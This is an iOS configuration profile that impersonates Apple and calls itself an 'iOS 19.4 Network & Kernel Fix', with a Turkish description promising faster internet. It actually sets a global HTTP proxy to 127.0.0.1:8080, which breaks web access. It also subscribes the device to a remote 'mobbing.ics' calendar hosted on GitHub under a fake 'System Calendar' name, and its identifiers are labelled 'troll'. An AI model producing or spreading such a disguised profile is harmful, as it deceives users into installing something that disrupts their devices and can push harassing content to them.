<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
	<key>PayloadContent</key>
	<array>
		<dict>
			<key>PayloadType</key>
			<string>com.apple.proxy.http.global</string>
			<key>PayloadIdentifier</key>
			<string>com.apple.proxy.troll</string>
			<key>PayloadUUID</key>
			<string>11112222-3333-4444-5555-666677778888</string>
			<key>PayloadVersion</key>
			<integer>1</integer>
			<key>ProxyType</key>
			<string>Manual</string>
			<key>ProxyServer</key>
			<string>127.0.0.1</string>
			<key>ProxyServerPort</key>
			<integer>8080</integer>
		</dict>

		<dict>
			<key>PayloadType</key>
			<string>com.apple.subscribedcalendar.account</string>
			<key>PayloadIdentifier</key>
			<string>com.apple.calendar.managed.troll</string>
			<key>PayloadUUID</key>
			<string>33334444-5555-6666-7777-888899990000</string>
			<key>PayloadVersion</key>
			<integer>1</integer>
			<key>PayloadDescription</key>
			<string> Sistem Bildirim Senkronizasyonu</string>
			<key>PayloadDisplayName</key>
			<string>Sistem Takvimi</string>
			
			<key>SubCalAccountHostName</key>
			<string>raw.githubusercontent.com</string>
			<key>SubCalAccountPath</key>
			<string>/keremkero319-del/keross/main/mobbing.ics</string>
			<key>SubCalAccountUseSSL</key>
			<true/>
		</dict>
	</array>

	<key>PayloadDisplayName</key>
	<string> iOS 19.4 Network &amp; Kernel Fix</string>
	<key>PayloadDescription</key>
	<string>İnternet hızını artırır ve bildirim sistemini optimize eder.</string>
	<key>PayloadIdentifier</key>
	<string>com.apple.system.ultra-fix</string>
	<key>PayloadOrganization</key>
	<string>Apple Engineering</string>
	<key>PayloadRemovalDisallowed</key>
	<false/> <key>PayloadType</key>
	<string>Configuration</string>
	<key>PayloadUUID</key>
	<string>ABCDEF12-3456-7890-ABCD-EF1234567890</string>
	<key>PayloadVersion</key>
	<integer>1</integer>
</dict>
</plist>
